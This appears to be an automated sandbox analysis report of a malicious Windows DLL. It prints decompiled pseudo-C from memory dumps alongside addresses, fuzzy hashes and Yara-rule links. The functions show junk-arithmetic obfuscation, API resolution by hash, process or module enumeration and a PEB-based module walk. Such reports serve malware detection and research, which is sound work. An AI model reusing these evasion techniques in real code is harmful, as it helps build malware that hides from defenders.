    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4BB3D0(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v33;
				signed int _t43;
				void* _t44;
				signed int _t49;
				signed int _t65;
				signed int _t71;
				signed char _t72;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t90;
				signed int _t96;
				signed int _t101;
				signed int _t104;
				intOrPtr _t106;
				signed int _t107;
				signed int _t108;
				signed int _t120;

				_t77 = _a16;
				_t80 = _a12;
				_t108 = _a8;
				_t101 = _a4;
				_v28 = _t108 | _t77;
				_t43 = _t101 | _t80;
				_v32 = _t43;
				_t83 = (_t80 - _t43) * _t43;
				_v24 = _t83;
				_v33 = _t83 * _t101;
				_t106 =  *0x6e4d50f0; // 0xff3ed4ff
				_t44 = E6E4B8AE0(0xd8b0f307);
				_t107 = _a12;
				if(_t106 == _t44 && (_v28 ^ _t77 | _v32 ^ _t107) != 0) {
					_t120 = _t108 ^ _t77 | _t107 ^ _a4;
					if(_t120 == 0 && _t120 == 0) {
						_t71 = _v33;
						_t104 = _t71 | _v32;
						_t72 = _t71 | _t104;
						_v33 = _t72;
						_v24 = _t104 | _t72;
						E6E4B29C0(_t72, _t104 | _t72, _v32);
						_v33 = _v24 ^ _v32;
					}
				}
				if((_v28 ^ _t77 | _v32 ^ _t107) == 0 && (_v28 ^ _t77 | _v32 ^ _t107) != 0 && (_v24 >> 0x0000001f ^ _t77 | _t107 ^ _v24) != 0 && (_t77 ^ _v28 | _v32 ^ _t107) == 0) {
					_t96 = _a4;
					_t65 = (_v33 & 0x000000ff | _t96) + _t107 + _t107;
					_v24 = _t65;
					_v33 = _t65 * _t96;
				}
				_t49 = _v33 * _v24 + _v32;
				_t90 = _t49 + 0xfa;
				_v24 = _t90;
				_v33 = _t49 * _t90;
				 *0x6e4d50d4 = _v33;
				return _v32;
			}

























    0x6e4bb3dc
    0x6e4bb3df
    0x6e4bb3e2
    0x6e4bb3e5
    0x6e4bb3ec
    0x6e4bb3f2
    0x6e4bb3f4
    0x6e4bb3fd
    0x6e4bb400
    0x6e4bb407
    0x6e4bb40b
    0x6e4bb416
    0x6e4bb420
    0x6e4bb423
    0x6e4bb43c
    0x6e4bb43e
    0x6e4bb442
    0x6e4bb44d
    0x6e4bb44f
    0x6e4bb451
    0x6e4bb45a
    0x6e4bb461
    0x6e4bb471
    0x6e4bb471
    0x6e4bb43e
    0x6e4bb483
    0x6e4bb4b9
    0x6e4bb4c3
    0x6e4bb4c5
    0x6e4bb4cc
    0x6e4bb4cc
    0x6e4bb4da
    0x6e4bb4e3
    0x6e4bb4e6
    0x6e4bb4ed
    0x6e4bb4f6
    0x6e4bb50a

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CopyMenuRectShowWindow
    • String ID:
    • API String ID: 2474721864-0
    • Opcode ID: f64fe39b084d997700920b761f3cb9c565352b63ba3907d1717f7ca8e2b07e94
    • Instruction ID: 24cb4cd313c531374fdd37470a6dc36a0303c815f15766f5576e3e4b35a40a6d
    • Opcode Fuzzy Hash: f64fe39b084d997700920b761f3cb9c565352b63ba3907d1717f7ca8e2b07e94
    • Instruction Fuzzy Hash: 8B412C71718345AF8748CE79C89186FBBE5AFD8260F04882EF499CB755D630D9048B62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B3E10, Relevance: .1, Instructions: 98COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4B3E10(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v53;
				signed int _t41;
				signed int _t48;
				signed int _t49;
				signed int _t51;
				signed char _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t68;
				signed char _t71;
				signed int _t75;
				signed int _t79;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t96;
				void* _t98;

				_t98 = (_t96 & 0xfffffff8) - 0x28;
				_t90 = _a16;
				_t41 = _a8;
				_t63 = _a4;
				_t71 = (_t63 ^ 0x00000158) + _t63;
				_v53 = _t71;
				_v52 = _t71 ^ _t63;
				_t94 = _t63 ^ _a12;
				_t75 = _t41 ^ _t90;
				_v32 = _t75;
				_v44 = _t75;
				_v48 = _t94;
				_t87 = _a12;
				if((_t41 ^ _v53 >> 0x0000001f | _t63 ^ _v53) == 0) {
					L2:
					_t48 = _v52 * _t87 + _t87 + _v48;
					_t64 = _t63 * _t48;
					_v52 = _t64;
					_t65 = _t64 - _t48;
					_v36 = _t65;
					_v53 = _t65 + 0x1a;
				} else {
					_t62 = E6E4BC9A0(_t87, _t90, _v53, _v53 >> 0x1f);
					_t87 = _a12;
					_t98 = _t98 + 0x10;
					if((_t62 & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t68 = _v53 * _t87;
				_v52 = _t68;
				_t49 = E6E4B8AE0(0x82efacc);
				_t88 = _a12;
				_t79 = _v53 + (_t49 & _t68);
				_v53 = _t79;
				_t51 = _t79;
				_v52 = _t51 + _t88;
				_v36 = _t51;
				_v28 = _t51 ^ _t88;
				if((_t90 ^ _v53 >> 0x0000001f | _t88 ^ _v53) != 0 && (_t94 | _v32) != 0) {
					_v36 = 0xe1;
					_v24 = 0xe1;
					_v53 = 0x000000e1 ^ _v28 ^ _t88 | _v48;
				}
				 *0x6e4d50d4 = _v53;
				return _v48;
			}






























    0x6e4b3e19
    0x6e4b3e1c
    0x6e4b3e1f
    0x6e4b3e22
    0x6e4b3e2d
    0x6e4b3e2f
    0x6e4b3e38
    0x6e4b3e3e
    0x6e4b3e43
    0x6e4b3e45
    0x6e4b3e49
    0x6e4b3e4d
    0x6e4b3e61
    0x6e4b3e64
    0x6e4b3e83
    0x6e4b3e90
    0x6e4b3e93
    0x6e4b3e96
    0x6e4b3e9a
    0x6e4b3e9c
    0x6e4b3ea3
    0x6e4b3e66
    0x6e4b3e74
    0x6e4b3e79
    0x6e4b3e7c
    0x6e4b3e81
    0x00000000
    0x00000000
    0x6e4b3e81
    0x6e4b3eac
    0x6e4b3eaf
    0x6e4b3eb8
    0x6e4b3ebd
    0x6e4b3eca
    0x6e4b3ecc
    0x6e4b3ed0
    0x6e4b3ed6
    0x6e4b3eda
    0x6e4b3ee0
    0x6e4b3ef4
    0x6e4b3f05
    0x6e4b3f0b
    0x6e4b3f13
    0x6e4b3f13
    0x6e4b3f1c
    0x6e4b3f30

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a02f3acef2e7eb855336c0577d12cc054bd873291ec5b422e5c8e18f5f67923c
    • Instruction ID: 22c2559693ec65816b444ff83b68fe36f7b5d5e5d094b9ae7c66a47700906cea
    • Opcode Fuzzy Hash: a02f3acef2e7eb855336c0577d12cc054bd873291ec5b422e5c8e18f5f67923c
    • Instruction Fuzzy Hash: F0318D71609742AFC708CF29C99196FFBE5ABD8210F44C82FF899C7741D634D9098BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4BC9A0, Relevance: .1, Instructions: 95COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4BC9A0(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v29;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t33;
				signed int _t35;
				signed int _t47;
				signed int _t48;
				signed int _t62;
				signed int _t65;
				signed int _t66;
				signed int _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_t83 = _a4;
				_t65 = _a16 ^ _a8;
				_t66 = _t83;
				_t84 = _t83 ^ _a12;
				_t86 = 0x2a1;
				if((_t84 | _t65) == 0) {
					_t86 = 0;
				}
				_v24 = _t86;
				_t87 = _t86 ^ _t66;
				_v28 = _t87;
				_t88 = _t87 * _t66;
				_v20 = _t88;
				_t33 = E6E4B8AE0(0x82ef969);
				_t89 = _a4;
				_t35 = _t33 * _t88 | _v20;
				_v20 = _t35;
				_v28 = _t35 + _t89;
				_t80 = _a8;
				if((_t84 | _t65) != 0 && (_v20 >> 0x0000001f ^ _t80 | _t89 ^ _v20) != 0) {
					_t62 = (_v28 | _t89) * 0x158;
					_v36 = _t62;
					_v20 = _t62 | 0x00000400;
				}
				if((_v36 >> 0x0000001f ^ _t80 | _t89 ^ _v36) != 0 && ((_v24 >> 0x0000001f ^ _t80 | _t89 ^ _v24) != 0 || (_v24 >> 0x0000001f ^ _t80 | _t89 ^ _v24) != 0 && (_t80 ^ _v36 >> 0x0000001f | _t89 ^ _v36) != 0)) {
					_t47 = _v20;
					_t72 = _a12 * _t47;
					_v29 = _t72;
					_t74 = _t72 + 0xe6;
					_v40 = _t74;
					_t75 = _t74 + _v24;
					_v28 = _t75;
					_t48 = _t47 & _t75;
					_v44 = _t48;
					_v20 = _t48 | _t75;
				}
				 *0x6e4d50b8 = _v20;
				return _v24;
			}



























    0x6e4bc9a9
    0x6e4bc9af
    0x6e4bc9b2
    0x6e4bc9b4
    0x6e4bc9bb
    0x6e4bc9c0
    0x6e4bc9c2
    0x6e4bc9c2
    0x6e4bc9c4
    0x6e4bc9c7
    0x6e4bc9c9
    0x6e4bc9cc
    0x6e4bc9cf
    0x6e4bc9d7
    0x6e4bc9e2
    0x6e4bc9e5
    0x6e4bc9e8
    0x6e4bc9ed
    0x6e4bc9f2
    0x6e4bc9f5
    0x6e4bca0c
    0x6e4bca12
    0x6e4bca1a
    0x6e4bca1a
    0x6e4bca2b
    0x6e4bca5b
    0x6e4bca61
    0x6e4bca64
    0x6e4bca6a
    0x6e4bca6d
    0x6e4bca70
    0x6e4bca73
    0x6e4bca76
    0x6e4bca78
    0x6e4bca7d
    0x6e4bca7d
    0x6e4bca83
    0x6e4bca92

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 915fce65ffc867555fe1647a7f803b593fe7d7338f876b76c605fa9f508fc500
    • Instruction ID: 4ee38b5b1236e85d19636f302773f1861ae409072fc579fc956b03e122cc3fe2
    • Opcode Fuzzy Hash: 915fce65ffc867555fe1647a7f803b593fe7d7338f876b76c605fa9f508fc500
    • Instruction Fuzzy Hash: BA312E71F1112A9B9F48DEB8CC925AFB7F1BB48310B04092AE915FB740D7709A008BE4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E509E34, Relevance: .1, Instructions: 75COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.302129642.000000006E509000.00000040.00020000.sdmp, Offset: 6E509000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
    • Instruction ID: 871e8131f7825b1404df822fff07eab5314d251ecaa386c18a9fe10b315336b1
    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
    • Instruction Fuzzy Hash: A81181733401019FDB54CE99DC90EA673EAEBD9230B25C566ED08CB319E636EC42C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4BEB90, Relevance: .1, Instructions: 75COMMON
    Download Yara Rule
    C-Code - Quality: 43%
    			E6E4BEB90(intOrPtr _a4) {
				intOrPtr _v32;
				char _v44;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t11;
				void* _t12;
				intOrPtr* _t13;
				void* _t16;
				intOrPtr* _t19;
				void* _t25;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;

				_t8 = E6E4CF5C0(0, 0x6aa0e84);
				_t30 = _t29 + 8;
				_t9 =  *_t8(4, 0);
				if(_t9 == 0xffffffff) {
					_t25 = 0xffffffff;
				} else {
					_t28 = _t9;
					_v44 = 0x1c;
					_t11 = E6E4CF5C0(0, 0xc75bea4);
					_t31 = _t30 + 8;
					_t12 =  *_t11(_t28,  &_v44);
					_t25 = 0;
					if(_t12 != 0) {
						do {
							_t16 = E6E4B2640(_t25, 0x4a799a56);
							_t25 = E6E4B6CC0(_v32 - _a4, _t16 + (0 | _v32 == _a4), E6E4B8AE0(0x425760da));
							_t19 = E6E4CF5C0(0, 0xc8c784);
							_t31 = _t31 + 0x1c;
							_push( &_v44);
							_push(_t28);
						} while ( *_t19() != 0);
					}
					_t13 = E6E4CF5C0(0, 0xb8e7db5);
					 *_t13(_t28);
				}
				return _t25;
			}

















    0x6e4beba0
    0x6e4beba5
    0x6e4bebac
    0x6e4bebb1
    0x6e4bec44
    0x6e4bebb7
    0x6e4bebb7
    0x6e4bebb9
    0x6e4bebc7
    0x6e4bebcc
    0x6e4bebd4
    0x6e4bebd6
    0x6e4bebda
    0x6e4bebe0
    0x6e4bebf1
    0x6e4bec14
    0x6e4bec1d
    0x6e4bec22
    0x6e4bec28
    0x6e4bec29
    0x6e4bec2c
    0x6e4bebe0
    0x6e4bec37
    0x6e4bec40
    0x6e4bec40
    0x6e4bec52

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 78c19a1216312c1cfce6844eb2e964833011aacae574a0d97138e7aa9814e196
    • Instruction ID: 06e61fc4789c65e290bac90490365ff9d142c6b63e754533424937ca2b119be9
    • Opcode Fuzzy Hash: 78c19a1216312c1cfce6844eb2e964833011aacae574a0d97138e7aa9814e196
    • Instruction Fuzzy Hash: 4A115C62E411043BE20069F46C42FEF35AC8BD556DF180526FA18F72C1FB75990541F7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4D0230, Relevance: .1, Instructions: 74COMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E6E4D0230(intOrPtr _a4) {
				intOrPtr _v20;
				char _v84;
				void* _t17;
				void* _t19;
				signed int _t21;
				void* _t23;
				signed int _t24;
				intOrPtr* _t26;
				signed int _t27;
				signed int _t30;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t35;
				void* _t36;

				_t17 = E6E4C3E90();
				_t27 = 0;
				if(_t17 != 0) {
					_t32 =  *((intOrPtr*)(_t17 + 0xc));
					_t26 =  *((intOrPtr*)(_t32 + 0xc));
					_t33 = _t32 + 0xc;
					if(_t26 != _t33) {
						_v20 = _t33;
						do {
							_t19 = E6E4B4290(0xfab3);
							_t36 = _t36 + 4;
							if(( *(_t26 + 0x2c) & 0x0000ffff) >= _t19) {
								goto L4;
							} else {
								_t21 =  *( *(_t26 + 0x30)) & 0x0000ffff;
								_t30 = 0;
								if(_t21 == 0) {
									L3:
									 *(_t35 + _t30 - 0x50) = 0;
									E6E4B20E0(1,  &_v84);
									_push(_t30);
									_t23 = E6E4B8E60( &_v84);
									_t36 = _t36 + 0xc;
									_t33 = _v20;
									if(_t23 == _a4) {
										_t27 =  *((intOrPtr*)(_t26 + 0x18));
									} else {
										goto L4;
									}
									goto L14;
								} else {
									while(1) {
										 *(_t35 + _t30 - 0x50) = _t21;
										_t24 = E6E4B2640(0,  !_t30);
										_t36 = _t36 + 8;
										_t30 = _t24;
										if(_t24 > 0x3e) {
											goto L3;
										}
										_t21 = ( *(_t26 + 0x30))[_t30] & 0x0000ffff;
										if(_t21 == 0) {
											goto L3;
										} else {
											if(1 != 0) {
												continue;
											} else {
												goto L3;
											}
										}
										goto L15;
									}
									goto L3;
								}
								L15:
							}
							goto L14;
							L4:
							_t26 =  *_t26;
						} while (_t26 != _t33);
						_t27 = 0;
					}
				}
				L14:
				return _t27;
				goto L15;
			}

















    0x6e4d0239
    0x6e4d023e
    0x6e4d0242
    0x6e4d0248
    0x6e4d024b
    0x6e4d024e
    0x6e4d0253
    0x6e4d0259
    0x6e4d0289
    0x6e4d0292
    0x6e4d0297
    0x6e4d029d
    0x00000000
    0x6e4d029f
    0x6e4d02a2
    0x6e4d02a5
    0x6e4d02aa
    0x6e4d0260
    0x6e4d0260
    0x6e4d0269
    0x6e4d0271
    0x6e4d0273
    0x6e4d0278
    0x6e4d027e
    0x6e4d0281
    0x6e4d02e0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4d02b0
    0x6e4d02b0
    0x6e4d02b0
    0x6e4d02b9
    0x6e4d02be
    0x6e4d02c1
    0x6e4d02c6
    0x00000000
    0x00000000
    0x6e4d02cb
    0x6e4d02d2
    0x00000000
    0x6e4d02d4
    0x6e4d02d8
    0x00000000
    0x6e4d02da
    0x00000000
    0x6e4d02da
    0x6e4d02d8
    0x00000000
    0x6e4d02d2
    0x00000000
    0x6e4d02b0
    0x00000000
    0x6e4d02aa
    0x00000000
    0x6e4d0283
    0x6e4d0283
    0x6e4d0285
    0x6e4d02dc
    0x6e4d02dc
    0x6e4d0253
    0x6e4d02e3
    0x6e4d02ec
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c97dda9801d8a4737c17aba470345ddfaa144c1ac0fa375451898c77f74ac10b
    • Instruction ID: c0fa505624c68513fe9827c150d23cc6e903418e7550e3ecf7d8c1ad58cbc124
    • Opcode Fuzzy Hash: c97dda9801d8a4737c17aba470345ddfaa144c1ac0fa375451898c77f74ac10b
    • Instruction Fuzzy Hash: 62115665E062264BDB908AF4D8B1EEF732AAB42B58F000467DC056B301FB61DD09C3F6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E50A22D, Relevance: .1, Instructions: 53COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.302129642.000000006E509000.00000040.00020000.sdmp, Offset: 6E509000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
    • Instruction ID: b90fcdec93f74b256973447da9b2a3c64e27c759478f4c18c98e2eece154f37b
    • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
    • Instruction Fuzzy Hash: 1801DE363042028FDB46CB6DD994EBDBBE8EBC2734B19C17EE54683616D235E945CA20
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B2730, Relevance: .0, Instructions: 46COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4B2730(signed short* _a4, signed short* _a8) {
				signed short* _t7;
				signed int _t9;
				signed short* _t10;
				signed int _t11;
				void* _t12;
				signed int _t13;

				_t10 = _a8;
				_t7 = _a4;
				if( *_t10 != 0) {
					_t13 =  *_t7 & 0x0000ffff;
					if(_t13 == 0) {
						L9:
						return 0;
					}
					_t11 =  *_t10 & 0x0000ffff;
					do {
						_t12 = 2;
						_t9 = _t11;
						0;
						while(_t9 != 0 && _t13 == _t9) {
							_t13 =  *(_t7 + _t12) & 0x0000ffff;
							_t9 =  *(_t10 + _t12) & 0x0000ffff;
							_t12 = _t12 + 2;
							if(_t13 != 0) {
								continue;
							}
							break;
						}
						if(_t9 != 0) {
							goto L8;
						}
						goto L10;
						L8:
						_t13 = _t7[1] & 0x0000ffff;
						_t7 =  &(_t7[1]);
					} while (_t13 != 0);
					goto L9;
				}
				L10:
				return _t7;
			}









    0x6e4b2733
    0x6e4b2737
    0x6e4b273f
    0x6e4b2741
    0x6e4b2747
    0x6e4b278b
    0x00000000
    0x6e4b278b
    0x6e4b2749
    0x6e4b2750
    0x6e4b2750
    0x6e4b2755
    0x6e4b275d
    0x6e4b2760
    0x6e4b276a
    0x6e4b2771
    0x6e4b2775
    0x6e4b2778
    0x00000000
    0x00000000
    0x00000000
    0x6e4b2778
    0x6e4b277d
    0x00000000
    0x00000000
    0x00000000
    0x6e4b277f
    0x6e4b277f
    0x6e4b2783
    0x6e4b2786
    0x00000000
    0x6e4b2750
    0x6e4b2790
    0x6e4b2790

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fa7d716b089524dc2f7d385a4bf6a4bc5e87ab36410886b3fa01f568e3c87611
    • Instruction ID: 660a7b9bf7a5ff197158208f08959c46b1065c4d68ffe7da8a6100450c499c27
    • Opcode Fuzzy Hash: fa7d716b089524dc2f7d385a4bf6a4bc5e87ab36410886b3fa01f568e3c87611
    • Instruction Fuzzy Hash: 65F0BE6B60922347D3608FB68450FB263F0EF81B95B25105BE8A06B290E7708C01D2BC
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4CE970, Relevance: .0, Instructions: 42COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4CE970(signed short* _a4, intOrPtr _a8) {
				signed char _t8;
				signed short* _t10;
				intOrPtr _t11;
				signed short* _t12;
				void* _t13;
				void* _t14;

				_t11 = _a8;
				_t12 = _a4;
				if(_t11 != 0) {
					_t12 =  &(_t12[1]);
					_t10 = 0;
					while( *((short*)(_t12 - 2)) != 0) {
						L3:
						_t12 =  &(_t12[1]);
					}
					_t8 = E6E4B7B00( *_t12 & 0x0000ffff, 0);
					_t14 = _t13 + 8;
					_t18 = _t8 & 0x00000001;
					if((_t8 & 0x00000001) != 0) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t10 = _t10 + 1;
						E6E4B6CC0(_t18, _t10, 1);
						_t13 = _t14 + 8;
						if(_t10 != _t11) {
							goto L3;
						} else {
						}
					}
				}
				return _t12;
			}









    0x6e4ce976
    0x6e4ce979
    0x6e4ce97e
    0x6e4ce980
    0x6e4ce983
    0x6e4ce98a
    0x6e4ce990
    0x6e4ce990
    0x6e4ce993
    0x6e4ce9a0
    0x6e4ce9a5
    0x6e4ce9a8
    0x6e4ce9aa
    0x6e4ce9be
    0x6e4ce9be
    0x6e4ce9ac
    0x6e4ce9af
    0x6e4ce9b0
    0x6e4ce9b5
    0x6e4ce9ba
    0x00000000
    0x00000000
    0x6e4ce9bc
    0x6e4ce9ba
    0x6e4ce9aa
    0x6e4ce9c6

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c7c39cc5f226215e91a3963c6a61972da5530e885cd5b9f521970bcca6ace37e
    • Instruction ID: 6726371c2209d2551e46fc2c3af9226c593d8fb48a98711b83a85f71664f50a9
    • Opcode Fuzzy Hash: c7c39cc5f226215e91a3963c6a61972da5530e885cd5b9f521970bcca6ace37e
    • Instruction Fuzzy Hash: 6FF0B4AAE5422455D6A019F55C87E76A37CCB41A19F14982BED5863280E3B2948481E3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4C1F90, Relevance: .0, Instructions: 26COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4C1F90(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;
				intOrPtr* _t9;

				_t5 = _a8;
				if(_t5 != 0) {
					_t6 = _a16;
					_t7 = _a12;
					_t9 = _a4;
					_t8 = 0;
					if( *_t9 == _t7) {
						L5:
						 *_t9 = _t6;
					} else {
						while(1) {
							L3:
							_t8 = _t8 + 1;
							_t9 = _t9 + 1;
							_t5 = _t5 - 1;
							if(_t5 == 0) {
								goto L6;
							}
							if( *_t9 != _t7) {
								continue;
							} else {
								goto L5;
							}
							L7:
						}
						goto L6;
					}
					goto L3;
				}
				L6:
				return _t5;
				goto L7;
			}








    0x6e4c1f92
    0x6e4c1f98
    0x6e4c1f9a
    0x6e4c1f9e
    0x6e4c1fa2
    0x6e4c1fa6
    0x6e4c1faa
    0x6e4c1fb9
    0x6e4c1fb9
    0x6e4c1fb0
    0x6e4c1fb0
    0x6e4c1fb0
    0x6e4c1fb0
    0x6e4c1fb1
    0x6e4c1fb2
    0x6e4c1fb3
    0x00000000
    0x00000000
    0x6e4c1fb7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4c1fb7
    0x00000000
    0x6e4c1fb0
    0x00000000
    0x6e4c1faa
    0x6e4c1fbf
    0x6e4c1fbf
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: edac2b45d96311c1aaa1b7a25e903e165dd5687b188b020ffe204de3e7435124
    • Instruction ID: eca183a9d733bb7113366cddad474b474e6a8097cd1314c0fe725853d0cccbf5
    • Opcode Fuzzy Hash: edac2b45d96311c1aaa1b7a25e903e165dd5687b188b020ffe204de3e7435124
    • Instruction Fuzzy Hash: 5BE04F5950D2D306D7518E746410C66EFF4998B954B14198EE4D057305C611C48D83B7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EDA28, Relevance: .0, Instructions: 18COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1dcb9d17c6bd49a5b8003de7c39815761d11ec8947e699be49e770c3bbb97ee4
    • Instruction ID: f65fefa0477c0fd62d90b491dcabf8d51f6851735b893ec72943eb1017fccd14
    • Opcode Fuzzy Hash: 1dcb9d17c6bd49a5b8003de7c39815761d11ec8947e699be49e770c3bbb97ee4
    • Instruction Fuzzy Hash: D0D0A77210861817C2013BE8A400EC67ECC8FD6366B25005BFA4CA7B418B71458183E5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4C3E90, Relevance: .0, Instructions: 2COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4C3E90() {

				return  *[fs:0x30];
			}



    0x6e4c3e96

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
